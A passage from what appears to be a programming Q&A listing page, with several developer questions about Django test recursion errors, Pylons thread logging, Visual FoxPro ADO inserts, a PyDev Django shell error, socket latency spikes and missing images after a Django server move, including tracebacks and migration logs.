and output } public void cancel() { try { mySocket.close(); } catch (IOException e) { Log.e(TAG, this.getName() + " SOCKET NOT CLOSED"); } } } }

    Read the article

  • RuntimeError: maximum recursion depth exceeded while calling a Python object

    - by Bilal Basharat
    this error arises when i try to run the following test case which is written in models.py of my django app named 'administration' : from django.test import Client, TestCase from django.core import mail class ClientTest( TestCase ): fixtures = [ 'testdata.json' ] def test_get_register( self ): response = self.client.get( '/accounts/register/', {} ) self.assertEqual( response.status_code, 200 ) the error arises at this line specifically: response = self.client.get( '/accounts/register/', {} ) my django version is 1.2.1 and python 2.6 and satchmo version is 0.9.2-pre hg-unknown. I code in windows platform(xp sp2). The command to run test case is: python manage.py test administration the complete error log is as follow: site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 121, in by_host site = by_host(host=host[4:], id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 124, in by_host site = by_host(host = 'www.%s' % host, id_only=id_only) File "build\bdist.win32\egg\threaded_multihost\sites.py", line 101, in by_host site = Site.objects.get(domain=host) File "C:\django\django\db\models\manager.py", line 132, in get return self.get_query_set().get(*args, **kwargs) File "C:\django\django\db\models\query.py", line 336, in get num = len(clone) File "C:\django\django\db\models\query.py", line 81, in __len__ self._result_cache = list(self.iterator()) File "C:\django\django\db\models\query.py", line 269, in iterator for row in compiler.results_iter(): File "C:\django\django\db\models\sql\compiler.py", line 672, in results_iter for rows in self.execute_sql(MULTI): File "C:\django\django\db\models\sql\compiler.py", line 717, in execute_sql sql, params = self.as_sql() File "C:\django\django\db\models\sql\compiler.py", line 65, in as_sql where, w_params = self.query.where.as_sql(qn=qn, connection=self.connection) File "C:\django\django\db\models\sql\where.py", line 91, in as_sql sql, params = child.as_sql(qn=qn, connection=connection) File "C:\django\django\db\models\sql\where.py", line 94, in as_sql sql, params = self.make_atom(child, qn, connection) File "C:\django\django\db\models\sql\where.py", line 141, in make_atom lvalue, params = lvalue.process(lookup_type, params_or_value, connection) File "C:\django\django\db\models\sql\where.py", line 312, in process connection=connection, prepared=True) File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) File "C:\django\django\db\models\fields\__init__.py", line 323, in get_db_prep _lookup return [self.get_db_prep_value(value, connection=connection, prepared=prepar ed)] File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) File "C:\django\django\db\models\fields\subclassing.py", line 53, in inner return func(*args, **kwargs) RuntimeError: maximum recursion depth exceeded while calling a Python object ---------------------------------------------------------------------- Ran 7 tests in 48.453s FAILED (errors=1) Destroying test database 'default'...

    Read the article

  • Logging in worker threads spawned from a pylons application does not seem to work

    - by TimM
    I have a pylons application where, under certain cirumstances I want to spawn multiple worker threads to process items in a queue. Right now we aren't making use of a ThreadPool (would be ideal, but we'll add that in later). The main problem is that the worker threads logging does not get written to the log files. When I run the code outside of the pylons application the logging works fine. So I think its something to do with the pylons log handler but not sure what. Here is a basic example of the code (trimmed down): import logging log = logging.getLogger(__name__) import sys from Queue import Queue from threading import Thread, activeCount def run(input, worker, args = None, simulteneousWorkerLimit = None): queue = Queue() threads = [] if args is not None: if len(args) > 0: args = list(args) args = [worker, queue] + args args = tuple(args) else: args = (worker, queue) # start threads for i in range(4): t = Thread(target = __thread, args = args) t.daemon = True t.start() threads.append(t) # add ThreadTermSignal inputData = list(input) inputData.extend([ThreadTermSignal] * 4) # put in the queue for data in inputData: queue.put(data) # block until all contents are downloaded queue.join() log.critical("** A log line that appears fine **") del queue for thread in threads: del thread del threads class ThreadTermSignal(object): pass def __thread(worker, queue, *args): try: while True: data = queue.get() if data is ThreadTermSignal: sys.exit() try: log.critical("** I don't appear when run under pylons **") finally: queue.task_done() except SystemExit: queue.task_done() pass Take note, that the log lin within the RUN method will show up in the log files, but the log line within the worker method (which is run in a spawned thread), does not appear. Any help would be appreciated. Thanks ** EDIT: I should mention that I tried passing in the "log" variable to the worker thread as well as redefining a new "log" variable within the thread and neither worked. ** EDIT: Adding the configuration used for the pylons application (which comes out of the INI file). So the snippet below is from the INI file. [loggers] keys = root [handlers] keys = wsgierrors [formatters] keys = generic [logger_root] level = WARNING handlers = wsgierrors [handler_console] class = StreamHandler args = (sys.stderr,) level = WARNING formatter = generic [handler_wsgierrors] class = pylons.log.WSGIErrorsHandler args = () level = WARNING format = generic

    Read the article

  • Adding new record to a VFP data table in VB.NET with ADO recordsets

    - by Gerry
    I am trying to add a new record to a Visual FoxPro data table using an ADO dataset with no luck. The code runs fine with no exceptions but when I check the dbf after the fact there is no new record. The mDataPath variable shown in the code snippet is the path to the .dbc file for the entire database. A note about the For loop at the bottom; I am adding the body of incoming emails to this MEMO field so thought I needed to break the addition of this string into 256 character Chunks. Any guidance would be greatly appreciated. cnn1.Open("Driver={Microsoft Visual FoxPro Driver};" & _ "SourceType=DBC;" & _ "SourceDB=" & mDataPath & ";Exclusive=No") Dim RS As ADODB.RecordsetS = New ADODB.Recordset RS.Open("select * from gennote", cnn1, 1, 3, 1) RS.AddNew() 'Assign values to the first three fields RS.Fields("ignnoteid").Value = NextIDI RS.Fields("cnotetitle").Value = "'" & mail.Subject & "'" RS.Fields("cfilename").Value = "''" 'Looping through 254 characters at a time and add the data 'to Ado Field buffer For i As Integer = 1 To Len(memo) Step liChunkSize liStartAt = i liWorkString = Mid(mail.Body, liStartAt, liChunkSize) RS.Fields("mnote").AppendChunk(liWorkString) Next 'Update the recordset RS.Update() RS.Requery() RS.Close()

    Read the article

  • PyDev and Django: PyDev breaking Django shell?

    - by Rosarch
    I've set up a new project, and populated it with simple models. (Essentially I'm following the tut.) When I run python manage.py shell on the command line, it works fine: >python manage.py shell Python 2.6.4 (r264:75708, Oct 26 2009, 08:23:19) [MSC v.1500 32 bit (Intel)] on win32 Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole) >>> from mysite.myapp.models import School >>> School.objects.all() [] Works great. Then, I try to do the same thing in Eclipse (using a Django project that is composed of the same files.) Right click on mysite project Django Shell with Django environment This is the output from the PyDev Console: >>> import sys; print('%s %s' % (sys.executable or sys.platform, sys.version)) C:\Python26\python.exe 2.6.4 (r264:75708, Oct 26 2009, 08:23:19) [MSC v.1500 32 bit (Intel)] >>> >>> from django.core import management;import mysite.settings as settings;management.setup_environ(settings) 'path\\to\\mysite' >>> from mysite.myapp.models import School >>> School.objects.all() Traceback (most recent call last): File "<console>", line 1, in <module> File "C:\Python26\lib\site-packages\django\db\models\query.py", line 68, in __repr__ data = list(self[:REPR_OUTPUT_SIZE + 1]) File "C:\Python26\lib\site-packages\django\db\models\query.py", line 83, in __len__ self._result_cache.extend(list(self._iter)) File "C:\Python26\lib\site-packages\django\db\models\query.py", line 238, in iterator for row in self.query.results_iter(): File "C:\Python26\lib\site-packages\django\db\models\sql\query.py", line 287, in results_iter for rows in self.execute_sql(MULTI): File "C:\Python26\lib\site-packages\django\db\models\sql\query.py", line 2368, in execute_sql cursor = self.connection.cursor() File "C:\Python26\lib\site-packages\django\db\backends\__init__.py", line 81, in cursor cursor = self._cursor() File "C:\Python26\lib\site-packages\django\db\backends\sqlite3\base.py", line 170, in _cursor self.connection = Database.connect(**kwargs) OperationalError: unable to open database file What am I doing wrong here?

    Read the article

  • Spikes in Socket Performance

    - by Harun Prasad
    We are facing random spikes in high throughput transaction processing system using sockets for IPC. Below is the setup used for the run: The client opens and closes new connection for every transaction, and there are 4 exchanges between the server and the client. We have disabled the TIME_WAIT, by setting the socket linger (SO_LINGER) option via getsockopt as we thought that the spikes were caused due to the sockets waiting in TIME_WAIT. There is no processing done for the transaction. Only messages are passed. OS used Centos 5.4 The average round trip time is around 3 milli seconds, but some times the round trip time ranges from 100 milli seconds to couple of seconds. Steps used for Execution and Measurement and output Starting the server $ python sockServerLinger.py /dev/null & Starting the client to post 1 million transactions to the server. And logs the time for a transaction in the client.log file. $ python sockClient.py 1000000 client.log Once the execution finishes the following command will show the execution time greater than 100 milliseconds in the format <line_number>:<execution_time>. $ grep -n "0.[1-9]" client.log | less Below is the example code for Server and Client. Server # File: sockServerLinger.py import socket, traceback,time import struct host = '' port = 9999 l_onoff = 1 l_linger = 0 lingeropt = struct.pack('ii', l_onoff, l_linger) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, lingeropt) s.bind((host, port)) s.listen(1) while 1: try: clientsock, clientaddr = s.accept() print "Got connection from", clientsock.getpeername() data = clientsock.recv(1024*1024*10) #print "asdasd",data numsent=clientsock.send(data) data1 = clientsock.recv(1024*1024*10) numsent=clientsock.send(data) ret = 1 while(ret>0): data1 = clientsock.recv(1024*1024*10) ret = len(data) clientsock.close() except KeyboardInterrupt: raise except: print traceback.print_exc() continue Client # File: sockClient.py import socket, traceback,sys import time i = 0 while 1: try: st = time.time() s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) while (s.connect_ex(('127.0.0.1',9999)) != 0): continue numsent=s.send("asd"*1000) response = s.recv(6000) numsent=s.send("asd"*1000) response = s.recv(6000) i+=1 if i == int(sys.argv[1]): break except KeyboardInterrupt: raise except: print "in exec:::::::::::::",traceback.print_exc() continue print time.time() -st

    Read the article

  • Images missing after moving Django to new server

    - by miszczu
    I'm moving Django project to new server. I'm newbie in Django, and I don't know where should be upload folder. There are all images which should be displayed on website. In config file I haven't seen upload folder I could specify, so I'm guessing it always should be the same location for django projects or I just can't find it. Locations are saved in database. When I've put uploaded files into media folder, so url was like domain.co.uk/media/upload/media/images/year/month/day/image_name.ext and the same is on the old website, images on website ware still missing. All images are visible if I put url by hand, but django doesn't seems to see files. Also I check django log file: 2012-05-30 09:13:33,393 ERROR render: Thumbnail tag failed: [in /usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py (line 49)] Traceback (most recent call last): File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py", line 45, in render return self._render(context) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py", line 97, in _render file_, geometry, **options File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/base.py", line 50, in get_thumbnail cached = default.kvstore.get(thumbnail) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/kvstores/base.py", line 25, in get return self._get(image_file.key) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/kvstores/base.py", line 123, in _get value = self._get_raw(add_prefix(key, identity)) File "/usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/kvstores/cached_db_kvstore.py", line 26, in _get_raw value = KVStoreModel.objects.get(key=key).value File "/usr/lib/python2.6/site-packages/django/db/models/manager.py", line 132, in get return self.get_query_set().get(*args, **kwargs) File "/usr/lib/python2.6/site-packages/django/db/models/query.py", line 344, in get num = len(clone) File "/usr/lib/python2.6/site-packages/django/db/models/query.py", line 82, in __len__ self._result_cache = list(self.iterator()) File "/usr/lib/python2.6/site-packages/django/db/models/query.py", line 273, in iterator for row in compiler.results_iter(): File "/usr/lib/python2.6/site-packages/django/db/models/sql/compiler.py", line 680, in results_iter for rows in self.execute_sql(MULTI): File "/usr/lib/python2.6/site-packages/django/db/models/sql/compiler.py", line 735, in execute_sql cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/util.py", line 34, in execute return self.cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/mysql/base.py", line 86, in execute return self.cursor.execute(query, args) File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 174, in execute self.errorhandler(self, exc, value) File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler raise errorclass, errorvalue DatabaseError: (1146, "Table 'thumbnail_kvstore' doesn't exist") 2012-05-30 09:13:33,396 DEBUG execute: (0.000) SELECT `freetext_freetext`.`id`, `freetext_freetext`.`key`, `freetext_freetext`.`content`, `freetext_freetext`.`active` FROM `freetext_freetext` WHERE (`freetext_freetext`.`active` = True AND `freetext_freetext`.`key` = office-closed-message ); args=(True, u'office-closed-message') [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] 2012-05-30 09:13:33,399 DEBUG execute: (0.000) SELECT `menus_menu`.`id`, `menus_menu`.`name`, `menus_menu`.`slug`, `menus_menu`.`base_url`, `menus_menu`.`description`, `menus_menu`.`enabled` FROM `menus_menu` WHERE (`menus_menu`.`enabled` = True AND `menus_menu`.`slug` = about ); args=(True, u'about') [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] 2012-05-30 09:13:33,401 DEBUG execute: (0.000) SELECT `menus_menuitem`.`id`, `menus_menuitem`.`menu_id`, `menus_menuitem`.`title`, `menus_menuitem`.`url`, `menus_menuitem`.`order` FROM `menus_menuitem` INNER JOIN `menus_menu` ON (`menus_menuitem`.`menu_id` = `menus_menu`.`id`) WHERE `menus_menu`.`slug` = about ORDER BY `menus_menuitem`.`order` ASC; args=(u'about',) [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] 2012-05-30 09:13:33,404 DEBUG execute: (0.000) SELECT `freetext_freetext`.`id`, `freetext_freetext`.`key`, `freetext_freetext`.`content`, `freetext_freetext`.`active` FROM `freetext_freetext` WHERE (`freetext_freetext`.`active` = True AND `freetext_freetext`.`key` = contactdetails-footer ); args=(True, u'contactdetails-footer') [in /usr/lib/python2.6/site-packages/django/db/backends/util.py (line 44)] I checked database and there is no table calls thumbnail_kvstore, but I have database backup, and in backup files this table doesn't exist. All uploaded files I get are in media/uploads/media/. Also I'm getting errors on some pages: Syntax error. Expected: ``thumbnail source geometry [key1=val1 key2=val2...] as var`` /usr/lib/python2.6/site-packages/sorl_thumbnail-11.12-py2.6.egg/sorl/thumbnail/templatetags/thumbnail.py in __init__, line 72 In template /var/www/vhosts/domain.co.uk/sites/apps/shop/products/templates/products/product_detail.html, error at line 34 {% thumbnail image.file "800x700" detail as zoom %} Maybe some modules I install are not in the right version. Dont know how to fix it. Im using, CentOS 6, mod_wsgi, apache, python 2.6. Update 1.0: On the old server was Django 1.3, on the new one is Django 1.3.1 Update 1.1: I this i know where is the problem. I tried python manage.py syncdb and this is output: Syncing... Creating tables ... The following content types are stale and need to be deleted: orders | ordercontact Any objects related to these content types by a foreign key will also be deleted. Are you sure you want to delete these content types? If you're unsure, answer 'no'. Type 'yes' to continue, or 'no' to cancel: no Installing custom SQL ... Installing indexes ... No fixtures found. Synced: > django.contrib.auth > django.contrib.contenttypes > django.contrib.sessions > django.contrib.sites > django.contrib.messages > django.contrib.admin > django.contrib.admindocs > django.contrib.markup > django.contrib.sitemaps > django.contrib.redirects > django_filters > freetext > sorl.thumbnail > django_extensions > south > currencies > pagination > tagging > honeypot > core > faq > logentry > menus > news > shop > shop.cart > shop.orders Not synced (use migrations): - dbtemplates - contactform - links - media - pages - popularity - testimonials - shop.brands - shop.collections - shop.discount - shop.pricing - shop.product_types - shop.products - shop.shipping - shop.tax (use ./manage.py migrate to migrate these) Next I run python manage.py migrate, and thats what i get: Running migrations for dbtemplates: - Migrating forwards to 0002_auto__del_unique_template_name. > dbtemplates:0001_initial ! Error found during real run of migration! Aborting. ! Since you have a database that does not support running ! schema-altering statements in transactions, we have had ! to leave it in an interim state between migrations. ! You *might* be able to recover with: = DROP TABLE `django_template` CASCADE; [] = DROP TABLE `django_template_sites` CASCADE; [] ! The South developers regret this has happened, and would ! like to gently persuade you to consider a slightly ! easier-to-deal-with DBMS. ! NOTE: The error which caused the migration to fail is further up. Traceback (most recent call last): File "manage.py", line 13, in <module> execute_manager(settings) File "/usr/lib/python2.6/site-packages/django/core/management/__init__.py", line 438, in execute_manager utility.execute() File "/usr/lib/python2.6/site-packages/django/core/management/__init__.py", line 379, in execute self.fetch_command(subcommand).run_from_argv(self.argv) File "/usr/lib/python2.6/site-packages/django/core/management/base.py", line 191, in run_from_argv self.execute(*args, **options.__dict__) File "/usr/lib/python2.6/site-packages/django/core/management/base.py", line 220, in execute output = self.handle(*args, **options) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/management/commands/migrate.py", line 105, in handle ignore_ghosts = ignore_ghosts, File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/__init__.py", line 191, in migrate_app success = migrator.migrate_many(target, workplan, database) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 221, in migrate_many result = migrator.__class__.migrate_many(migrator, target, migrations, database) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 292, in migrate_many result = self.migrate(migration, database) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 125, in migrate result = self.run(migration) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 99, in run return self.run_migration(migration) File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 81, in run_migration migration_function() File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/migration/migrators.py", line 57, in <lambda> return (lambda: direction(orm)) File "/usr/lib/python2.6/site-packages/django_dbtemplates-1.3-py2.6.egg/dbtemplates/migrations/0001_initial.py", line 18, in forwards ('last_changed', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)), File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/db/generic.py", line 226, in create_table ', '.join([col for col in columns if col]), File "/usr/lib/python2.6/site-packages/South-0.7.3-py2.6.egg/south/db/generic.py", line 150, in execute cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/util.py", line 34, in execute return self.cursor.execute(sql, params) File "/usr/lib/python2.6/site-packages/django/db/backends/mysql/base.py", line 86, in execute return self.cursor.execute(query, args) File "/usr/lib64/python2.6/site-packages/MySQLdb/cursors.py", line 174, in execute self.errorhandler(self, exc, value) File "/usr/lib64/python2.6/site-packages/MySQLdb/connections.py", line 36, in defaulterrorhandler raise errorclass, errorvalue _mysql_exceptions.OperationalError: (1050, "Table 'django_template' already exists") Also i run python manage.py migrate --list, and uotput is: dbtemplates (*) 0001_initial (*) 0002_auto__del_unique_template_name contactform (*) 0001_initial (*) 0002_auto__add_callback (*) 0003_auto__add_field_callback_notes (*) 0004_auto__add_field_callback_is_closed__add_field_callback_closed (*) 0005_auto__add_field_callback_url (*) 0006_auto__add_contact (*) 0007_auto__add_field_contact_category (*) 0008_auto__add_field_contact_url links (*) 0001_initial (*) 0002_auto__add_field_category_enabled__add_field_category_order media (*) 0001_initial (*) 0002_auto__del_field_image_external_url__add_field_image_link_url__del_fiel (*) 0003_add_model_FileAttachment (*) 0004_auto__chg_field_file_slug__chg_field_image_slug (*) 0005_auto__chg_field_image_file (*) 0006_auto__chg_field_file_file pages (*) 0001_initial (*) 0002_auto__chg_field_page_meta_description__chg_field_page_meta_title__chg_ (*) 0003_auto__add_field_page_show_in_sitemap (*) 0004_auto__add_field_page_changefreq__add_field_page_priority popularity (*) 0001_initial testimonials (*) 0001_initial (*) 0002_auto__add_field_testimonial_is_featured brands (*) 0001_initial (*) 0002_auto__add_field_brand_template (*) 0003_auto__chg_field_brand_meta_description__chg_field_brand_meta_title__ch (*) 0004_auto__add_field_brand_url (*) 0005_auto__del_field_brand_image__add_field_brand_logo collections (*) 0001_initial (*) 0002_auto__add_field_collection_discount (*) 0003_auto__chg_field_collection_meta_description__chg_field_collection_meta (*) 0004_auto__add_field_collection_is_featured (*) 0005_auto__add_field_collection_order discount (*) 0001_initial (*) 0002_added_field_discount_description (*) 0003_auto__add_field_discountvoucher_automatic (*) 0004_auto__add_field_discountvoucher_collection (*) 0005_auto__del_field_discountvoucher_collection (*) 0006_auto__chg_field_discountvoucher_expiry_date pricing (*) 0001_initial (*) 